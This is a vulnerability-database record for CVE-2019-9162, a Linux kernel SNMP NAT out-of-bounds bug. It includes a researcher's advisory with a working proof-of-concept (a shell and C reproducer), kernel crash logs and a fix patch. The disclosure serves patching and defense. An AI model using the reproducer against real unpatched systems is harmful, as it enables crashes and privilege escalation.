ID CVE-2019-9162 Type cve Reporter cve@mitre.org Modified 2019-06-15T01:29:00
Description
In the Linux kernel before 4.20.12, net/ipv4/netfilter/nf_nat_snmp_basic_main.c in the SNMP NAT module has insufficient ASN.1 length checks (aka an array index error), making out-of-bounds read and write operations possible, leading to an OOPS or local privilege escalation. This affects snmp_version and snmp_helper.
{"f5": [{"lastseen": "2020-04-06T22:39:56", "bulletinFamily": "software", "cvelist": ["CVE-2019-9162"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-06-15T01:07:00", "published": "2019-06-15T01:07:00", "id": "F5:K31864522", "href": "https://support.f5.com/csp/article/K31864522", "title": "Linux kernel vulnerability CVE-2019-9162", "type": "f5", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-03-01T16:24:45", "description": "", "published": "2019-03-01T00:00:00", "type": "exploitdb", "title": "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9162"], "modified": "2019-03-01T00:00:00", "id": "EDB-ID:46477", "href": "https://www.exploit-db.com/exploits/46477", "sourceData": "commit cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\",\r\nfirst in 4.16) changed the nf_nat_snmp_basic module (which, when enabled, parses\r\nand modifies the ASN.1-encoded payloads of SNMP messages) so that the kernel's\r\nASN.1 infrastructure is used instead of an open-coded parser. The common ASN.1\r\ndecoder can invoke callbacks when certain objects are encountered. 
The SNMP\r\nhelper has two such callbacks defined in nf_nat_snmp_basic.asn1:\r\n\r\n - For the `version` field of a `Message` (an `INTEGER`), snmp_version() is\r\n invoked.\r\n - For each `IpAddress` (according to RFC 1155, a 4-byte octet string),\r\n snmp_helper() is invoked.\r\n\r\nThese callbacks contain the following code:\r\n\r\n\r\nint snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n}\r\n\r\nint snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n{\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n __be32 *pdata = (__be32 *)data;\r\n\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n\r\n if (*ctx->check)\r\n fast_csum(ctx, (unsigned char *)data - ctx->begin);\r\n *pdata = ctx->to;\r\n }\r\n\r\n return 1;\r\n}\r\n\r\n\r\nThe problem is that both of these callbacks can be invoked by the ASN.1 parser\r\nwith `data` pointing at the end of the packet and `datalen==0` (even though, for\r\nthe `INTEGER` type, X.690 says in section 8.3.1 that \"The contents octets shall\r\nconsist of one or more octets\"), but they don't check whether there is\r\nsufficient input available. This means that snmp_version() can read up to one\r\nbyte out-of-bounds and leak whether that byte was <=1, and snmp_helper() can\r\nread and potentially also write up to four bytes out-of-bounds.\r\n\r\nUnfortunately, KASAN can't detect the out-of-bounds reads because, as was\r\npointed out in\r\n<https://lore.kernel.org/lkml/552d49b6-1b6e-c320-b56a-a119e360f1d7@gmail.com/>\r\nregarding a (harmless) out-of-bounds read in the TCP input path, the kernel\r\nstores a `struct skb_shared_info` at the end of the socket buffer allocation,\r\ndirectly behind the packet data. 
The kernel can only detect that a problem\r\noccurred based on the later effects of an out-of-bounds write.\r\nIt might be a good idea to explicitly add some KASAN poison between the head\r\ndata and struct skb_shared_info to make it easier for kernel fuzzers to discover\r\nissues like this in the future.\r\n\r\n\r\nThere are two scenarios in which this bug might be attacked:\r\n\r\n - A router that performs NAT translation is explicitly set up to invoke the\r\n SNMP helper, and a device in the NATted network wants to attack the router.\r\n This is probably very rare, since the router would need to be explicitly\r\n configured to perform SNMP translation. On top of that, to corrupt memory,\r\n an attacker would need to be able to completely fill an SKB; it isn't clear\r\n to me whether that is possible remotely.\r\n - A local attacker could exploit the bug by setting up new network namespaces\r\n with an iptables configuration that invokes SNMP translation. This probably\r\n works as a local privilege escalation against some distribution kernels.\r\n The normal autoloading path for this code was only set up in\r\n commit 95c97998aa9f (\"netfilter: nf_nat_snmp_basic: add missing helper alias\r\n name\", first in 4.20), but from a glance, it looks like it would be possible\r\n on kernels before 4.20 to instead first load one of the openvswitch module's\r\n aliases \"net-pf-16-proto-16-family-ovs_*\" through ctrl_getfamily(), then use\r\n ovs_ct_add_helper() to trigger loading of \"nf_nat_snmp_basic\" through the\r\n alias \"ip_nat_snmp_basic\".\r\n\r\n\r\nThe following is a reproducer for a git master build that causes a kernel oops\r\n(nf_nat_snmp_basic must be compiled into the kernel, or built as a module, I\r\nthink):\r\n\r\n======================================================================\r\n#!/bin/sh\r\nunshare -mUrnp --mount-proc --fork bash <<SCRIPT_EOF\r\nset -e\r\nset -x\r\n\r\n# make \"ip netns\" work in here\r\nmount -t tmpfs none /var/run/\r\ncd 
/var/run\r\n\r\n# this namespace is the router with NAT\r\nip link set dev lo up\r\necho 1 > /proc/sys/net/ipv4/ip_forward\r\n/sbin/iptables -t nat -A POSTROUTING -o veth0 -j MASQUERADE\r\n/sbin/iptables -t raw -A PREROUTING -p udp --dport 162 -j CT --helper snmp_trap\r\n/sbin/iptables -A FORWARD -m conntrack --ctstate INVALID,NEW,RELATED,ESTABLISHED,SNAT,DNAT -m helper --helper snmp_trap -j ACCEPT\r\n\r\n# this namespace is the destination host for the SNMP trap message\r\nip netns add netns1\r\nnsenter --net=/var/run/netns/netns1 ip link set dev lo up\r\nip link add veth0 type veth peer name veth1\r\nip link set veth1 netns netns1\r\nnsenter --net=/var/run/netns/netns1 /sbin/ifconfig veth1 192.168.0.2/24 up\r\n/sbin/ifconfig veth0 192.168.0.1/24 up\r\n\r\n# this namespace sends the SNMP trap message\r\nip netns add netns2\r\nnsenter --net=/var/run/netns/netns2 ip link set dev lo up\r\nip link add veth2 type veth peer name veth3\r\nip link set veth3 netns netns2\r\n# /31 network, see RFC 3021\r\n# we want *.0.0.0 so that the 3 OOB bytes can be zero\r\nnsenter --net=/var/run/netns/netns2 /sbin/ifconfig veth3 10.0.0.0/31 up\r\n/sbin/ifconfig veth2 10.0.0.1/24 up\r\nnsenter --net=/var/run/netns/netns2 ip route add default via 10.0.0.1\r\n\r\n# debug\r\nip route\r\nnsenter --net=/var/run/netns/netns2 ip route\r\n\r\n# run the PoC\r\ncat > udp_repro.c <<C_EOF\r\n#define _GNU_SOURCE\r\n#include <arpa/inet.h>\r\n#include <stdlib.h>\r\n#include <errno.h>\r\n#include <stdarg.h>\r\n#include <net/if.h>\r\n#include <linux/if.h>\r\n#include <linux/ip.h>\r\n#include <linux/udp.h>\r\n#include <linux/in.h>\r\n#include <err.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n\r\n#define IPADDR(a,b,c,d) (((a)<<0)+((b)<<8)+((c)<<16)+((d)<<24))\r\n\r\n// \"pc X\" comments in the following array refer to indices into\r\n// nf_nat_snmp_basic_machine in \"nf_nat_snmp_basic.asn1.c\", 
which\r\n// is generated as part of the kernel's build process.\r\n// reading the ASN.1 decoder and the generated machine opcodes\r\n// seemed easier than trying to build ASN.1 by looking at the\r\n// spec or something like that...\r\nuint8_t snmp_packet[] = {\r\n // pc 0: read tag, should match _tag(UNIV, CONS, SEQ) == 0x30\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 2: read tag, should match _tag(UNIV, PRIM, INT) == 0x02\r\n // version number\r\n 0x02, 0x01,\r\n 0x00,\r\n\r\n // pc 5: read tag, should match _tag(UNIV, PRIM, OTS) == 0x04\r\n 0x04, 0x00,\r\n\r\n // pc 7: read tag, should match _tagn(CONT, CONS, 0) == 0xa0\r\n // selects GetRequest-PDU, length indef\r\n 0xa0, 0x80,\r\n\r\n // pc 34: read INT request-id\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 36: read INT error-status\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 38: read INT error-index\r\n 0x02, 0x04,\r\n 0x00, 0x00, 0x00, 0x00,\r\n\r\n // pc 40: read seq VarBindList\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // pc 42: read seq VarBind\r\n // length indef\r\n 0x30, 0x80,\r\n\r\n // ptr 44: read tag, should match _tag(UNIV, PRIM, OID) == 0x06\r\n // ObjectName\r\n // (can use 0x82 as length to have two bytes of length following)\r\n // length chosen so that the end of packet data is directly\r\n // followed by the skb_shared_info, with the whole thing in a\r\n // kmalloc-512 slab.\r\n 0x06, 0x70,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\r\n\r\n // ptr 46: read tag, should skip\r\n // ptr 48: read tag, should skip\r\n // ptr 50: read tag, should skip\r\n // ptr 52: read tag, should match _tagn(APPL, PRIM, 0) == 0x40\r\n // IpAddress\r\n // we 
could also use a length of zero, and the callback would still\r\n // be invoked, but we want control over the first byte so that we\r\n // can create a source IP match.\r\n 0x40, 0x01,\r\n // source IP 10.0.0.0\r\n 0x0a\r\n};\r\n\r\nvoid do_sendto(int sockfd, const void *buf, size_t len, int flags, const struct sockaddr *dest_addr, socklen_t addrlen) {\r\n int res = sendto(sockfd, buf, len, flags, dest_addr, addrlen);\r\n if (res != len) {\r\n if (res == -1)\r\n err(1, \"send failed\");\r\n else\r\n errx(1, \"partial send?\");\r\n }\r\n}\r\n\r\nint main(void) {\r\n int sock = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sock == -1) err(1, \"socket\");\r\n\r\n struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(162), .sin_addr = { .s_addr = IPADDR(192,168,0,2) } };\r\n\r\n // __ip_append_data() overallocates by 15 bytes for some reason; cancel it out\r\n // by using CORK to first send 15 bytes short, then append the remaining 15 bytes\r\n do_sendto(sock, snmp_packet, sizeof(snmp_packet)-15, MSG_MORE, (struct sockaddr *)&sa, sizeof(sa));\r\n do_sendto(sock, ((char*)snmp_packet)+sizeof(snmp_packet)-15, 15, 0, (struct sockaddr *)&sa, sizeof(sa));\r\n}\r\nC_EOF\r\ngcc -o udp_repro udp_repro.c -Wall\r\nnsenter --net=/var/run/netns/netns2 ./udp_repro\r\nSCRIPT_EOF\r\n======================================================================\r\n\r\nCorresponding splat:\r\n\r\n======================================================================\r\n[ 260.101983] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.134983] LoadPin: vda1 (254:1): writable\r\n[ 260.135981] LoadPin: enforcement can be disabled.\r\n[ 260.137085] LoadPin: kernel-module pinned obj=\"/lib/modules/5.0.0-rc5/kernel/net/bpfilter/bpfilter.ko\" pid=1095 cmdline=\"/sbin/modprobe -q -- bpfilter\"\r\n[ 260.143100] bpfilter: Loaded bpfilter_umh pid 1096\r\n[ 260.171851] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.248339] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[ 260.250475] 
IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[ 260.261136] IPVS: ftp: loaded support on port[0] = 21\r\n[ 260.347678] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[ 260.621924] page:ffffea000703de00 count:0 mapcount:-128 mapping:0000000000000000 index:0x0\r\n[ 260.624264] flags: 0x17fffc000000000()\r\n[ 260.625373] raw: 017fffc000000000 ffffea0007a6d408 ffffea000783fe08 0000000000000000\r\n[ 260.627650] raw: 0000000000000000 0000000000000003 00000000ffffff7f 0000000000000000\r\n[ 260.629926] page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)\r\n[ 260.631958] ------------[ cut here ]------------\r\n[ 260.633312] kernel BUG at ./include/linux/mm.h:546!\r\n[ 260.634771] invalid opcode: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN\r\n[ 260.636693] CPU: 6 PID: 1121 Comm: udp_repro Not tainted 5.0.0-rc5 #263\r\n[ 260.638583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[ 260.641031] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.642266] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.647667] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.649556] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.651639] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.653712] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.655786] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.657857] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.659939] FS: 0000000000000000(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.662281] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.664171] CR2: 00007fe2da7af5e0 CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.666987] DR0: 0000000000000000 DR1: 0000000000000000 
DR2: 0000000000000000\r\n[ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.672035] Call Trace:\r\n[ 260.672761] ? release_task+0x860/0x860\r\n[ 260.673864] ? __fd_install+0x88/0x140\r\n[ 260.674946] ? handle_mm_fault+0x82/0x130\r\n[ 260.676100] do_group_exit+0x79/0x120\r\n[ 260.677157] __x64_sys_exit_group+0x28/0x30\r\n[ 260.678362] do_syscall_64+0x73/0x160\r\n[ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 260.680878] RIP: 0033:0x7fe2da7af618\r\n[ 260.681922] Code: Bad RIP value.\r\n[ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\r\n[ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618\r\n[ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000\r\n[ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98\r\n[ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0\r\n[ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000\r\n[ 260.695412] Modules linked in: bpfilter\r\n[ 260.696776] ---[ end trace d5f4a4a31d762416 ]---\r\n[ 260.698931] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: ffff8881e083fe78\r\n[ 260.715326] FS: 00007fe2dac99700(0000) GS:ffff8881eb180000(0000) knlGS:0000000000000000\r\n[ 260.717071] CS: 0010 
DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 260.718340] CR2: 00007fe2da7af5ee CR3: 000000002de2b002 CR4: 0000000000360ee0\r\n[ 260.719867] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\r\n[ 260.721389] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.722923] Fixing recursive fault but reboot is needed!\r\n======================================================================\r\n\r\n\r\nIt also works against a Debian testing distro kernel if you first (as root)\r\nset kernel.unprivileged_userns_clone=1 and modprobe nf_nat_snmp_basic; splat:\r\n\r\n======================================================================\r\n[17260.886470] IPv6: ADDRCONF(NETDEV_UP): veth1: link is not ready\r\n[17260.887304] IPv6: ADDRCONF(NETDEV_UP): veth0: link is not ready\r\n[17260.887310] IPv6: ADDRCONF(NETDEV_CHANGE): veth0: link becomes ready\r\n[17260.887334] IPv6: ADDRCONF(NETDEV_CHANGE): veth1: link becomes ready\r\n[17260.930188] IPv6: ADDRCONF(NETDEV_UP): veth3: link is not ready\r\n[17260.931286] IPv6: ADDRCONF(NETDEV_CHANGE): veth3: link becomes ready\r\n[17261.115583] BUG: Bad page state in process Xorg pfn:276500\r\n[17261.115588] page:ffffcf4ac9d94000 count:-1 mapcount:0 mapping:0000000000000000 index:0x0\r\n[17261.115595] flags: 0x17fffc000000000()\r\n[17261.115598] raw: 017fffc000000000 dead000000000100 dead000000000200 0000000000000000\r\n[17261.115599] raw: 0000000000000000 0000000000000000 ffffffffffffffff 0000000000000000\r\n[17261.115601] page dumped because: nonzero _count\r\n[17261.115602] Modules linked in: veth xt_helper xt_conntrack nf_nat_snmp_basic nf_conntrack_snmp nf_conntrack_broadcast xt_CT xt_tcpudp nft_counter nft_chain_nat_ipv4 ipt_MASQUERADE nf_nat_ipv4 nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nft_compat nf_tables nfnetlink uinput atm netrom appletalk psnap llc ax25 snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer joydev qxl snd soundcore ttm 
drm_kms_helper drm sg evdev virtio_balloon serio_raw virtio_console crct10dif_pclmul crc32_pclmul pcspkr ghash_clmulni_intel button ip_tables x_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto ecb btrfs xor zstd_decompress zstd_compress xxhash hid_generic usbhid hid raid6_pq libcrc32c crc32c_generic sr_mod cdrom ata_generic virtio_net net_failover virtio_blk failover crc32c_intel\r\n[17261.115641] ata_piix libata ehci_pci aesni_intel uhci_hcd aes_x86_64 ehci_hcd crypto_simd cryptd virtio_pci usbcore scsi_mod psmouse glue_helper virtio_ring i2c_piix4 usb_common virtio floppy\r\n[17261.115652] CPU: 14 PID: 653 Comm: Xorg Not tainted 4.19.0-1-amd64 #1 Debian 4.19.12-1\r\n[17261.115653] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014\r\n[17261.115654] Call Trace:\r\n[17261.115681] dump_stack+0x5c/0x80\r\n[17261.115688] bad_page.cold.115+0x7f/0xb2\r\n[17261.115690] get_page_from_freelist+0xf51/0x1200\r\n[17261.115694] ? reservation_object_reserve_shared+0x32/0x70\r\n[17261.115696] ? get_page_from_freelist+0x8c3/0x1200\r\n[17261.115698] __alloc_pages_nodemask+0x112/0x2b0\r\n[17261.115703] new_slab+0x288/0x6e0\r\n[17261.115707] ? update_blocked_averages+0x3ca/0x560\r\n[17261.115708] ___slab_alloc+0x378/0x500\r\n[17261.115710] ? update_nohz_stats+0x41/0x50\r\n[17261.115713] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115715] ? shmem_alloc_inode+0x16/0x30\r\n[17261.115716] __slab_alloc+0x1c/0x30\r\n[17261.115717] kmem_cache_alloc+0x192/0x1c0\r\n[17261.115719] shmem_alloc_inode+0x16/0x30\r\n[17261.115722] alloc_inode+0x1b/0x80\r\n[17261.115725] new_inode_pseudo+0xc/0x60\r\n[17261.115726] new_inode+0x12/0x30\r\n[17261.115728] shmem_get_inode+0x49/0x220\r\n[17261.115731] __shmem_file_setup.part.42+0x3f/0x130\r\n[17261.115754] drm_gem_object_init+0x26/0x40 [drm]\r\n[17261.115758] qxl_bo_create+0x79/0x170 [qxl]\r\n[17261.115762] qxl_gem_object_create+0x60/0x120 [qxl]\r\n[17261.115764] ? 
qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115767] qxl_gem_object_create_with_handle+0x4e/0xb0 [qxl]\r\n[17261.115769] qxl_alloc_ioctl+0x42/0xa0 [qxl]\r\n[17261.115777] ? drm_dev_enter+0x19/0x50 [drm]\r\n[17261.115785] drm_ioctl_kernel+0xa1/0xf0 [drm]\r\n[17261.115807] drm_ioctl+0x1fc/0x390 [drm]\r\n[17261.115810] ? qxl_map_ioctl+0x20/0x20 [qxl]\r\n[17261.115812] ? ep_scan_ready_list.constprop.22+0x1fc/0x220\r\n[17261.115814] ? __hrtimer_init+0xb0/0xb0\r\n[17261.115816] ? timerqueue_add+0x52/0x80\r\n[17261.115834] ? enqueue_hrtimer+0x38/0x90\r\n[17261.115835] ? hrtimer_start_range_ns+0x1b7/0x2c0\r\n[17261.115836] do_vfs_ioctl+0xa4/0x630\r\n[17261.115840] ? __sys_recvmsg+0x83/0xa0\r\n[17261.115841] ksys_ioctl+0x60/0x90\r\n[17261.115843] __x64_sys_ioctl+0x16/0x20\r\n[17261.115846] do_syscall_64+0x53/0x100\r\n[17261.115851] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[17261.115852] RIP: 0033:0x7fb3e93d3747\r\n[17261.115854] Code: 00 00 90 48 8b 05 49 a7 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 19 a7 0c 00 f7 d8 64 89 01 48\r\n[17261.115855] RSP: 002b:00007ffc43daf3f8 EFLAGS: 00003246 ORIG_RAX: 0000000000000010\r\n[17261.115856] RAX: ffffffffffffffda RBX: 0000562c71bece00 RCX: 00007fb3e93d3747\r\n[17261.115857] RDX: 00007ffc43daf430 RSI: 00000000c0086440 RDI: 000000000000000e\r\n[17261.115857] RBP: 00007ffc43daf430 R08: 0000562c71bece00 R09: 00000000000003d1\r\n[17261.115858] R10: 0000562c71085010 R11: 0000000000003246 R12: 00000000c0086440\r\n[17261.115858] R13: 000000000000000e R14: 0000562c710bcba0 R15: 0000562c710d82f0\r\n[17261.115860] Disabling lock debugging due to kernel taint\r\n======================================================================\r\n\r\n\r\nI suggest the following patch (copy attached with proper whitespace); I have\r\ntested that it prevents my PoC from crashing the kernel, but I haven't tested\r\nwhether SNMP NATting still 
works.\r\n\r\n======================================================================\r\nFrom b94c17fa81f8870885baaec7815eee8b789d2c7b Mon Sep 17 00:00:00 2001\r\nFrom: Jann Horn <jannh@google.com>\r\nDate: Wed, 6 Feb 2019 22:56:15 +0100\r\nSubject: [PATCH] netfilter: nf_nat_snmp_basic: add missing length checks in\r\n ASN.1 cbs\r\n\r\nThe generic ASN.1 decoder infrastructure doesn't guarantee that callbacks\r\nwill get as much data as they expect; callbacks have to check the `datalen`\r\nparameter before looking at `data`. Make sure that snmp_version() and\r\nsnmp_helper() don't read/write beyond the end of the packet data.\r\n\r\n(Also move the assignment to `pdata` down below the check to make it clear\r\nthat it isn't necessarily a pointer we can use before the `datalen` check.)\r\n\r\nFixes: cc2d58634e0f (\"netfilter: nf_nat_snmp_basic: use asn1 decoder library\")\r\nSigned-off-by: Jann Horn <jannh@google.com>\r\n---\r\n net/ipv4/netfilter/nf_nat_snmp_basic_main.c | 7 ++++++-\r\n 1 file changed, 6 insertions(+), 1 deletion(-)\r\n\r\ndiff --git a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\nindex a0aa13bcabda..0a8a60c1bf9a 100644\r\n--- a/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n+++ b/net/ipv4/netfilter/nf_nat_snmp_basic_main.c\r\n@@ -105,6 +105,8 @@ static void fast_csum(struct snmp_ctx *ctx, unsigned char offset)\r\n int snmp_version(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n+ if (datalen != 1)\r\n+ return -EINVAL;\r\n if (*(unsigned char *)data > 1)\r\n return -ENOTSUPP;\r\n return 1;\r\n@@ -114,8 +116,11 @@ int snmp_helper(void *context, size_t hdrlen, unsigned char tag,\r\n const void *data, size_t datalen)\r\n {\r\n struct snmp_ctx *ctx = (struct snmp_ctx *)context;\r\n- __be32 *pdata = (__be32 *)data;\r\n+ __be32 *pdata;\r\n \r\n+ if (datalen != 4)\r\n+ return -EINVAL;\r\n+ pdata = (__be32 *)data;\r\n if (*pdata == ctx->from) {\r\n pr_debug(\"%s: 
 %pI4 to %pI4\\n\", __func__,\r\n (void *)&ctx->from, (void *)&ctx->to);\r\n-- \r\n2.20.1.611.gfbb209baf1-goog\r\n======================================================================", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46477"}], "zdt": [{"lastseen": "2019-03-05T02:20:55", "description": "Exploit for linux platform in category dos / poc", "edition": 1, "published": "2019-03-02T00:00:00", "title": "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9162"], "modified": "2019-03-02T00:00:00", "id": "1337DAY-ID-32291", "href": "https://0day.today/exploit/description/32291", "sourceData": "Linux < 4.14.103 / < 4.19.25 - Out-of-Bounds Read and Write in SNMP NAT Module\r\n\r\n[advisory body omitted here: it is a verbatim copy of the EDB-ID:46477 sourceData above]"}]}
DR2: 0000000000000000\r\n[ 260.670022] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\r\n[ 260.672035] Call Trace:\r\n[ 260.672761] ? release_task+0x860/0x860\r\n[ 260.673864] ? __fd_install+0x88/0x140\r\n[ 260.674946] ? handle_mm_fault+0x82/0x130\r\n[ 260.676100] do_group_exit+0x79/0x120\r\n[ 260.677157] __x64_sys_exit_group+0x28/0x30\r\n[ 260.678362] do_syscall_64+0x73/0x160\r\n[ 260.679440] entry_SYSCALL_64_after_hwframe+0x44/0xa9\r\n[ 260.680878] RIP: 0033:0x7fe2da7af618\r\n[ 260.681922] Code: Bad RIP value.\r\n[ 260.682872] RSP: 002b:00007ffd5a5e12c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\r\n[ 260.685057] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe2da7af618\r\n[ 260.687125] RDX: 0000000000000000 RSI: 000000000000003c RDI: 0000000000000000\r\n[ 260.689197] RBP: 00007fe2daa8c8e0 R08: 00000000000000e7 R09: ffffffffffffff98\r\n[ 260.691264] R10: 00007ffd5a5e1248 R11: 0000000000000246 R12: 00007fe2daa8c8e0\r\n[ 260.693343] R13: 00007fe2daa91c20 R14: 0000000000000000 R15: 0000000000000000\r\n[ 260.695412] Modules linked in: bpfilter\r\n[ 260.696776] ---[ end trace d5f4a4a31d762416 ]---\r\n[ 260.698931] RIP: 0010:do_exit+0x1391/0x1440\r\n[ 260.700171] Code: 89 86 68 05 00 00 48 89 ac 24 e0 00 00 00 e9 2a f5 ff ff 4d 89 fd e9 6d f2 ff ff 48 c7 c6 c0 cf 67 99 48 89 ef e8 ef a5 24 00 <0f> 0b 48 8d bb 20 05 00 00 e8 11 77 2b 00 48 8d bb 18 05 00 00 4c\r\n[ 260.705625] RSP: 0018:ffff8881e083fd98 EFLAGS: 00010286\r\n[ 260.707183] RAX: 000000000000003e RBX: ffff8881deed4240 RCX: 0000000000000000\r\n[ 260.708823] RDX: 0000000000000000 RSI: dffffc0000000000 RDI: ffffffff9b65eaa0\r\n[ 260.710384] RBP: ffffea000703de00 R08: ffffed103d633ec9 R09: ffffed103d633ec9\r\n[ 260.711888] R10: 0000000000000001 R11: ffffed103d633ec8 R12: ffffea000703de34\r\n[ 260.713785] R13: ffff8881e6262140 R14: ffff8881e083f918 R15: 